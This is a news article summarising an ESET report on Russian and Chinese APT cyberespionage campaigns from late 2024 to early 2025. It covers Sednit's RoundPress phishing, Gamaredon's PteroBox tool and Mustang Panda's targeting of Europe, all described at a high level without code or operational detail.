In recent months, cybersecurity analysts at ESET have observed a significant increase in cyberespionage activity originating from Russian APT (Advanced Persistent Threat) groups. The primary targets have been government and defense institutions, as well as companies in the technology and transport sectors. This article reveals the inner workings of these cyberattacks, offering detailed examples and operational breakdowns.
The Digital Face of Warfare
ESET researchers have published a report summarizing APT activity between October 2024 and March 2025. Chinese-linked groups remained the most active (40.1% of observed activity), followed by Russian groups (25.7%). North Korean (14.4%) and Iranian (9.1%) actors also played significant roles.
APT groups are typically state-sponsored cybercriminals, or entities operating on behalf of nation-states. These actors specialize in long-term, targeted cyberoperations aimed at infiltrating high-value systems—often those of government bodies or major corporations. Their goal is to remain undetected while stealing sensitive data. With access to advanced tools, deep technical expertise, and substantial funding, these groups conduct highly sophisticated campaigns.
One of the most aggressive China-linked actors, Mustang Panda, continues to launch persistent attacks on European entities—especially those in maritime transport and government sectors. Its recent targets include Poland, the UK, and Norway.
“Across Europe, government institutions remain the primary targets of APT cyberespionage, whereas in other regions, technology firms bear the brunt,” notes Kamil Sadkowski, malware analyst at ESET. “In Europe, the defense sector ranks fourth in targeted sectors, whereas globally, it does not make the top five. Ukraine has been hit hardest, mainly due to relentless campaigns by Russian-linked groups targeting critical infrastructure and government institutions.”
Russian Cyberspies and the Long-Term Campaign
One of the most notable operations during this period is RoundPress, a campaign attributed to the Russian APT group Sednit (also known as APT28 or Fancy Bear). This campaign began in 2023 and intensified throughout 2024, primarily targeting government and defense institutions in Central and Eastern Europe.
Notably, RoundPress appears to be focused on entities involved in supplying weapons to Ukraine—a clear indication of its strategic intent. According to ESET analysts, the operation is likely connected to Russia’s military intelligence agency, GRU.
“Sednit has been active since at least 2004 and is believed to have ties to the GRU. It was one of the groups behind the breach of the Democratic National Committee ahead of the 2016 U.S. presidential election. It’s also linked to the TV5Monde attack and the leak of WADA (World Anti-Doping Agency) emails,” Sadkowski adds.
“The scale and coordination of RoundPress indicate a high level of state backing. Among its targets were defense contractors and state agencies, likely in search of intelligence on military aid to Ukraine and diplomatic initiatives.”
The Phishing Trap
Most attacks begin with a phishing email. These messages often appear harmless, disguised as news updates about current events.
For example, in September 2024, Sednit sent out a phishing email from kyivinfo24@ukr[.]net with the subject line:
“SBU detains banker accused of spying in Kharkiv.”
The email mimicked a newsletter and included links to articles from Kyiv Post, a well-known Ukrainian newspaper. Hidden JavaScript within the HTML code executed upon opening, silently granting attackers access to the victim’s email data.
In another case, Bulgarian internet users received a phishing email in November 2024, sent from a compromised account. The subject claimed that then-President Donald Trump had accepted Russian terms regarding the war. It appeared to link to content from Bulgarian news site News.bg.
“These campaigns are adapted for regional targets across Central and Eastern Europe, reflecting GRU’s geographic priorities,” says Sadkowski.
Exploiting System Vulnerabilities
Later in 2024, ESET identified campaigns exploiting vulnerabilities in Mozilla Firefox and Microsoft Windows, carried out by the RomCom APT group. Founded in 2022, RomCom is known for attacks on Ukrainian governmental and security institutions.
These intrusions allowed attackers to gain high-level system access and install spyware without any user interaction. According to ESET telemetry, the campaign targeted up to 250 systems, suggesting a wide-scale operation.
Gamaredon – Russia’s Most Aggressive APT
Gamaredon remains one of Russia’s most active and aggressive APT groups. In late 2024, its operations became even more sophisticated, using new code obfuscation techniques—such as fake command-and-control server addresses—to complicate analysis.
October 2024 saw a record number of unique malware samples linked to Gamaredon. In November, the group introduced a new tool: PteroBox, malware designed to exfiltrate Office files, PDFs, images, and databases to Dropbox.
“Gamaredon is not only aggressive but also consistently evolving,” notes Sadkowski.
“Its use of advanced evasion methods is a reminder that defending sensitive data and infrastructure requires constant vigilance—especially in strategic sectors.”
China’s Mustang Panda Targets Europe
Meanwhile, Mustang Panda—the most active Chinese-linked APT group operating in Europe—continues its focus on maritime transport and government bodies. Its recent targets again include Poland, the United Kingdom, and Norway.
Final Thoughts
The escalation of cyberespionage activity from Russian and Chinese APTs underscores the geopolitical dimensions of digital warfare. These operations are not random acts of cybercrime but are carefully coordinated campaigns aligned with strategic state objectives—whether it’s undermining Ukrainian defense, stealing diplomatic intelligence, or sabotaging infrastructure.
As the digital battleground continues to expand, particularly in Central and Eastern Europe, defending against APT threats will require not only technical resilience but also international cooperation and intelligence sharing.
Source: ESET APT Activity Report Q4 2024 – Q1 2025
Original publication: CEO.com.pl
